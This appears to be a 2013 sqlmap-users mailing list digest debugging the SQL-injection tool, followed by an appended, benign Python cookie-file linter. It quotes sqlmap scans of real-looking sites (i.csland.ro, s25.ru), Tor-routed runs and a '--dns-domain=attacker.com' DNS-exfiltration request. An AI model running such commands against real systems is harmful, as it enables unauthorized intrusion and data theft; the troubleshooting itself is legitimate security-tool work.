>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
>> > Traceback (most recent call last):
>> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>> >     assert domain_specified == initial_dot
>> > AssertionError
>> >
>> > _warn_unhandled_exception()
>> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>> > '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>> >
>> > the 999.. looks strange to me.
>> >
>> > >
>> > >
>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>> > >
>> > > Hi Dirk.
>> > >
>> > > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>> > >
>> >
>> > that's true but IMO 0 represents just a session cookie. Example:
>> >
>> > prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
>> > # HTTP cookie file.
>> > # Generated by Wget on 2013-04-15 11:23:13.
>> > # Edit at your own risk.
>> >
>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>> > .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>> > .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>> > .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>> > .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>> > .bing.com TRUE / FALSE 0 _HOP
>> > .bing.com TRUE / FALSE 0 _FS NU=1
>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>> > www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>> >
>> > prompt%
>> >
>> > Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>> >
>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
>> > cookie only for the first 120 tries.
>> >
>> > Cheers, Dirk
>> >
>> >
>> > >
>> > > Kind regards,
>> > > Miroslav Stampar
>> > >
>> > >
>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>> > >
>> > >
>> > > Hi Miroslav,
>> > >
>> > > thx for your prompt answer.
>> > >
>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>> > > > Hi Dirk.
>> > > >
>> > > > Could you please get the latest revision and retry it again?
>> > > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>> > > The slight difference seems to be that in the case where I didn't supply a cookie
>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>> > > >
>> > > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>> > > >
>> > > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>> > >
>> > > sure, here you go:
>> > >
>> > > --snip
>> > > # Netscape HTTP Cookie File
>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>> > > [..]
>> > > --snap
>> > >
>> > > They are all session cookies. For easier reading here I put some blanks in the line
>> > > above, in "cookie-file" there aren't any though. Cookies were generated with
>> > > stompy and a shell script (looks he same as with
>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>> > >
>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>> > >
>> > > >
>> > > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>> > >
>> > > see above.
>> > >
>> > > Cheers,
>> > >
>> > > Dirk
>> > >
>> > > >
>> > > >
>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
>> > > >
>> > > > Hi Miroslav,
>> > > >
>> > > > yes unfortunately.
>> > > >
>> > > > If I omit the cookie line in the request header completely, sqlmap
>> > > > seems to take the first cookie issued by the server with set-cookie (and
>> > > > put's it silently in).
>> > > > >> > > > Cheers, >> > > > >> > > > Dirk >> > > > >> > > > >> > > > >> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: >> > > > > Hi. >> > > > > >> > > > > And this is also happening if you are skipping "Cookie: >> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? >> > > > > >> > > > > Kind regards, >> > > > > Miroslav Stampar >> > > > > >> > > > > >> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> >> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto: >> sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr...<mailto: >> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> >> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto: >> sp...@dr... <mailto:sp...@dr...>>>>> wrote: >> > > > > >> > > > > >> > > > > Hi folks, >> > > > > >> > > > > .... that doesn't work for me. It always uses the cookie supplied >> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one >> > > > > from the 1st server reply is being used) >> > > > > >> > > > > So what is wrong in here: >> > > > > >> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce >> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \ >> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \ >> > > > > --level=2 --risk=2 -r $REQUEST >> > > > > >> > > > > The content of the file $REQUEST is: >> > > > > >> > > > > POST <URL> HTTP/1.1 >> > > > > Host: <HOST> >> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) >> AppleWebKit/525.13 (KHTML, like Gecko) >> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> < >> http://0.2.149.6> <http://0.2.149.6> Safari/525.13 >> > > > > Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 >> > > > > Accept-Language: en-US,en;q=0.5 >> > > > > Accept-Encoding: gzip, deflate >> > > > > Referer: <Referer> >> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7 >> > > > > Connection: keep-alive 
>> > > > > Content-Type: application/x-www-form-urlencoded >> > > > > Content-Length: 67 >> > > > > >> > > > > <abunchofpostparams> >> > > > > >> > > > > >> > > > > No hints that cookie-file is not in correct format (I've been >> through this, >> > > > > at least I think I so ;) ). >> > > > > >> > > > > Any insight would be much appreciated. >> > > > > >> > > > > >> > > > > Cheers, >> > > > > >> > > > > Dirk >> > > > > >> > > > > >> > > > >
>> > > > > >> > > > > >> > > > > >> > > > > >> > > > > -- >> > > > > Miroslav Stampar >> > > > > http://about.me/stamparm >> > > > >> > > > >> > > > >> > > > >> > > > -- >> > > > Miroslav Stampar >> > > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > > >> > > >> > > >> > > >> > > -- >> > > Miroslav Stampar >> > > http://about.me/stamparm >> > >> > >> > >> > >> > -- >> > Miroslav Stampar >> > http://about.me/stamparm >> >> >> >> >> ------------------------------ >> >> Message: 6 >> Date: Mon, 15 Apr 2013 14:01:01 -0700 >> From: <co...@5i...> >> Subject: [sqlmap-users] --host parameter >> To: sql...@li... >> Message-ID: >> < >> 201...@em... >> > >> >> Content-Type: text/plain; charset="utf-8" >> >> Hello, >> the --host doesn't work as expected, or I am doing something wrong: >> >> >> this works as expected: >> >> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >> >> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> takeover tool >> http://sqlmap.org >> >> [!] legal disclaimer: Usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility to >> obey all applicable local, state and federal laws. Developers assume no >> liability and are not responsible for any misuse or damage caused by >> this program >> >> [*] starting at 23:57:15 >> >> [23:57:15] [INFO] testing connection to the target URL >> [23:57:15] [INFO] heuristics detected web page charset 'ascii' >> [23:57:15] [INFO] testing if the target URL is stable. 
This can take a >> couple of seconds >> [23:57:16] [INFO] target URL is stable >> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >> [23:57:16] [INFO] GET parameter 'id' is dynamic >> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >> might be injectable (possible DBMS: 'MySQL') >> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >> >> >> .... >> >> >> this doesn't work as expected: >> >> ./sqlmap.py --host='i.csland.ro' >> --url='http://188.240.236.15/index.php?id=0' >> >> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> takeover tool >> http://sqlmap.org >> >> [!] legal disclaimer: Usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility to >> obey all applicable local, state and federal laws. Developers assume no >> liability and are not responsible for any misuse or damage caused by >> this program >> >> [*] starting at 23:58:03 >> >> [23:58:03] [INFO] testing connection to the target URL >> [23:58:03] [CRITICAL] page not found (404) >> it is not recommended to continue in this kind of cases. Do you want to >> quit and make sure that everything is set up properly? [Y/n] >> [23:58:05] [WARNING] HTTP error codes detected during run: >> >> ............ >> >> >> Of course i.csland.ro resolves to 188.240.236.15. Any idea? >> >> Thanks. >> >> >> >> >> ------------------------------ >> >> Message: 7 >> Date: Tue, 16 Apr 2013 09:12:05 +1100 >> From: ???????? ?????? <vo...@s2...> >> Subject: [sqlmap-users] Sqlmap and direct connect error >> To: sql...@li... >> Message-ID: <C59...@s2...> >> Content-Type: text/plain; charset=us-ascii >> >> Hi! >> >> This bug detected if add direct param. 
>> >> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> --exclude-sysdbs >> >> >> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >> retry your run with the latest development version from the GitHub >> repository. If the exception persists, please send by e-mail to ' >> sql...@li...' or open a new issue at ' >> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> text and any information required to reproduce the bug. The developers will >> try to reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 1.0-dev-de99717 >> Python version: 2.7.3 >> Operating system: posix >> Command line: sqlmap.py -d >> **************************************************** -u >> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> --exclude-sysdbs >> Technique: None >> Back-end DBMS: MySQL (identified) >> Traceback (most recent call last): >> File "sqlmap.py", line 87, in main >> start() >> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >> start >> action() >> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >> setHandler() >> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >> setHandler >> conf.dbmsConnector.connect() >> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >> connect >> self.connector = pymysql.connect(host=self.hostname, user=self.user, >> passwd=self.password, db=self.db, port=self.port, >> connect_timeout=conf.timeout, use_unicode=True) >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >> line 93, in Connect >> return Connection(*args, **kwargs) >> File >> 
"/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> line 584, in __init__ >> self._connect() >> File >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> line 739, in _connect >> sock.connect((self.host, self.port)) >> File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >> connect >> raise GeneralProxyError((5, _generalerrors[5])) >> GeneralProxyError: (5, 'bad input') >> >> >> >> >> ------------------------------ >> >> Message: 8 >> Date: Tue, 16 Apr 2013 14:19:18 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] --host parameter >> To: co...@5i... >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+...@ma...> >> Content-Type: text/plain; charset="iso-8859-1" >> >> Hi. >> >> Thank you for your report and find it fixed with the latest commit [1]. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 >> >> >> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: >> >> > Hello, >> > the --host doesn't work as expected, or I am doing something wrong: >> > >> > >> > this works as expected: >> > >> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' >> > >> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.org >> > >> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility to >> > obey all applicable local, state and federal laws. Developers assume no >> > liability and are not responsible for any misuse or damage caused by >> > this program >> > >> > [*] starting at 23:57:15 >> > >> > [23:57:15] [INFO] testing connection to the target URL >> > [23:57:15] [INFO] heuristics detected web page charset 'ascii' >> > [23:57:15] [INFO] testing if the target URL is stable. 
This can take a >> > couple of seconds >> > [23:57:16] [INFO] target URL is stable >> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic >> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic >> > [23:57:16] [INFO] GET parameter 'id' is dynamic >> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' >> > might be injectable (possible DBMS: 'MySQL') >> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' >> > >> > >> > .... >> > >> > >> > this doesn't work as expected: >> > >> > ./sqlmap.py --host='i.csland.ro' >> > --url='http://188.240.236.15/index.php?id=0' >> > >> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.org >> > >> > [!] legal disclaimer: Usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility to >> > obey all applicable local, state and federal laws. Developers assume no >> > liability and are not responsible for any misuse or damage caused by >> > this program >> > >> > [*] starting at 23:58:03 >> > >> > [23:58:03] [INFO] testing connection to the target URL >> > [23:58:03] [CRITICAL] page not found (404) >> > it is not recommended to continue in this kind of cases. Do you want to >> > quit and make sure that everything is set up properly? [Y/n] >> > [23:58:05] [WARNING] HTTP error codes detected during run: >> > >> > ............ >> > >> > >> > Of course i.csland.ro resolves to 188.240.236.15. Any idea? >> > >> > Thanks. >> > >> > >> > >> > >> ------------------------------------------------------------------------------ >> > Precog is a next-generation analytics platform capable of advanced >> > analytics on semi-structured data. The platform includes APIs for >> building >> > apps and a phenomenal toolset for data science. Developers can use >> > our toolset for easy data analysis & visualization. Get a free account! 
>> > http://www2.precog.com/precogplatform/slashdotnewsletter >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 9 >> Date: Tue, 16 Apr 2013 14:33:33 +0200 >> From: Miroslav Stampar <mir...@gm...> >> Subject: Re: [sqlmap-users] Sqlmap and direct connect error >> To: ???????? ?????? <vo...@s2...> >> Cc: SqlMap List <sql...@li...> >> Message-ID: >> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...> >> Content-Type: text/plain; charset="koi8-r" >> >> Hi Vladimir. >> >> Find it "patched" with the latest commit [1]. Basically, those >> combinations >> should not be allowed (-d and --url; -d and --tor; etc.) and now we've >> added new option validation checks for this kind of cases. >> >> Kind regards, >> Miroslav Stampar >> >> [1] >> >> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a >> >> >> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote: >> >> > Hi! >> > >> > This bug detected if add direct param. >> > >> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " >> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor >> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> > --exclude-sysdbs >> > >> > >> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, >> retry >> > your run with the latest development version from the GitHub >> repository. If >> > the exception persists, please send by e-mail to ' >> > sql...@li...' or open a new issue at ' >> > https://github.com/sqlmapproject/sqlmap/issues/new' with the following >> > text and any information required to reproduce the bug. 
The developers >> will >> > try to reproduce the bug, fix it accordingly and get back to you. >> > sqlmap version: 1.0-dev-de99717 >> > Python version: 2.7.3 >> > Operating system: posix >> > Command line: sqlmap.py -d >> > **************************************************** -u >> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor >> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables >> > --exclude-sysdbs >> > Technique: None >> > Back-end DBMS: MySQL (identified) >> > Traceback (most recent call last): >> > File "sqlmap.py", line 87, in main >> > start() >> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in >> > start >> > action() >> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action >> > setHandler() >> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in >> > setHandler >> > conf.dbmsConnector.connect() >> > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in >> > connect >> > self.connector = pymysql.connect(host=self.hostname, user=self.user, >> > passwd=self.password, db=self.db, port=self.port, >> > connect_timeout=conf.timeout, use_unicode=True) >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", >> > line 93, in Connect >> > return Connection(*args, **kwargs) >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> > line 584, in __init__ >> > self._connect() >> > File >> > >> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", >> > line 739, in _connect >> > sock.connect((self.host, self.port)) >> > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in >> > connect >> > raise GeneralProxyError((5, _generalerrors[5])) >> > GeneralProxyError: (5, 'bad input') >> > >> > >> > >> > >> ------------------------------------------------------------------------------ >> > 
>> > >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> -------------- next part -------------- >> An HTML attachment was scrubbed... >> >> ------------------------------ >> >> Message: 10 >> Date: Tue, 16 Apr 2013 23:26:39 +0200 >> From: buawig <bu...@gm...> >> Subject: [sqlmap-users] feature request: offline mode for >> --dns-domain? >> To: SqlMap List <sql...@li...> >> Message-ID: <516...@gm...> >> Content-Type: text/plain; charset=UTF-8 >> >> Hi, >> >> in cases where sqlmap is run against targets on internal networks it >> would be great if one could tell sqlmap to simply proceed without >> expecting incoming DNS requests, because sqlmap can not be executed >> directly on the DNS server (which can't reach the target, but the >> target can reach the DNS server). >> >> For me it would be enough to simply run something like >> -u ... --dns-domain=attacker.com --dns-port=0 >> (--dns-port does not exist [yet]) >> >> to let sqlmap know that it doesn't need to start a DNS listener. >> >> I would then collect and decode the DNS querries on the DNS server >> manually, but I could also envision running a second sqlmap instance >> on the DNS server with --dns-domain (but without -u) doing that job. 
>> >> >> >> ------------------------------ >> >> Message: 11 >> Date: Tue, 16 Apr 2013 23:24:23 +0200 >> From: buawig <bu...@gm...> >> Subject: [sqlmap-users] feature request: --dns-domain for non-root >> users (--dns-port) >> To: sql...@li... 
>> Message-ID: <516...@gm...> >> Content-Type: text/plain; charset=UTF-8 >> >> Hi, >> >> I just wanted to request a "extension" for a previous feature request >> (DNS exfiltration [1]) but after looking at my former feature request >> I realized that it included already the feature I was about to request: >> >> --dns-domain for non-root users: >> --dns-port >> >> The use-case is mentioned in the former feature request: >> >> [1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100 >> >> >> >> ------------------------------ >> >> Message: 12 >> Date: Tue, 16 Apr 2013 20:52:26 -0500 >> From: Brian Milliron <Br...@EC...> >> Subject: [sqlmap-users] Domain credentials >> To: sql...@li... >> Message-ID: <516...@EC...> >> Content-Type: text/plain; charset=ISO-8859-1; format=flowed >> >> What is the correct format to make a direct connection to a database >> using windows domain credentials? 
>> I have tried >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\user:pass" >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\\user:pass" >> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred >> "DOMAIN\user:pass" --auth-type NTLM >> ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB" >> >> I get this error "[CRITICAL] DB-Lib error message 20017, severity 9: >> Unexpected EOF from the server >> Net-Lib error during Operation now in progress Error 115 - Operation now >> in progressDB-Lib error message 20002, severity 9: >> Adaptive Server connection failed" >> >> >> >> ------------------------------ >> >> Message:... [truncated message content] |
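The cookie-file problems raised in the --load-cookies messages quoted above (the `domain_specified == initial_dot` assertion, the `0` expiry on session cookies, tabs versus blanks) can be checked before a file is handed to a loader. The linter below is an added example, not part of the original thread and not sqlmap's code; the function names, the `example.test` hosts, the sample file and the fixed clock are assumptions constructed for illustration.

```python
import time

# Column order of a Netscape-format cookies.txt line (tab separated).
FIELDS = ("domain", "domain_flag", "path", "secure", "expires", "name", "value")

FLAG_MISMATCH = "domain flag TRUE/FALSE does not match leading dot on domain"
SESSION_ZERO = "expires=0: session cookie, dropped as expired by timestamp-comparing loaders"
EXPIRED = "expiry timestamp is in the past"


def lint_cookie_line(line, now):
    """Return a list of problems for one cookies.txt line (empty list = clean)."""
    line = line.rstrip("\r\n")
    if not line.strip() or line.startswith("#"):
        return []  # blank lines and comments are skipped by loaders
    parts = line.split("\t")
    if len(parts) != len(FIELDS):
        # Typical cause: blanks pasted in place of tabs.
        return ["expected 7 tab-separated fields, found %d" % len(parts)]
    rec = dict(zip(FIELDS, parts))
    problems = []
    for key in ("domain_flag", "secure"):
        if rec[key] not in ("TRUE", "FALSE"):
            problems.append("%s must be TRUE or FALSE, found %r" % (key, rec[key]))
    # The condition behind the AssertionError in the traceback: the flag is
    # TRUE exactly when the domain is written with a leading dot.
    if (rec["domain_flag"] == "TRUE") != rec["domain"].startswith("."):
        problems.append(FLAG_MISMATCH)
    expires = rec["expires"]
    if expires == "0":
        # wget --keep-session-cookies writes 0 for session cookies; a loader
        # that compares the field with the current time sees 1970, i.e. expired.
        problems.append(SESSION_ZERO)
    elif expires != "" and not expires.isdigit():
        problems.append("expires must be a UNIX timestamp, found %r" % expires)
    elif expires.isdigit() and int(expires) <= now:
        problems.append(EXPIRED)
    return problems


def lint_cookie_file(text, now=None):
    """Map 1-based line numbers to their problems; clean lines are omitted."""
    now = time.time() if now is None else now
    report = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        problems = lint_cookie_line(line, now)
        if problems:
            report[lineno] = problems
    return report


# Constructed sample file (hosts and values are made up for this example).
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    "app.example.test\tFALSE\t/shop\tTRUE\t0\tJSESSIONID\tAAAA",
    "app.example.test\tTRUE\t/shop\tTRUE\t9999999999\tJSESSIONID\tBBBB",
    ".example.test\tTRUE\t/\tFALSE\t1429089794\tPREF\tCCCC",
    "app.example.test FALSE /shop TRUE 0 JSESSIONID DDDD",
    "www.example.test\tFALSE\t/\tFALSE\t1000000000\tOLD\tEEEE",
])
SAMPLE_NOW = 1366000000  # fixed clock (mid-April 2013) so results are repeatable

if __name__ == "__main__":
    for lineno, problems in sorted(lint_cookie_file(SAMPLE, SAMPLE_NOW).items()):
        for problem in problems:
            print("line %d: %s" % (lineno, problem))
```

Line 3 of the sample has the same shape as the line rejected in the traceback (flag `TRUE` on a host written without a leading dot), and line 5 shows what a loader sees when blanks replace the tabs.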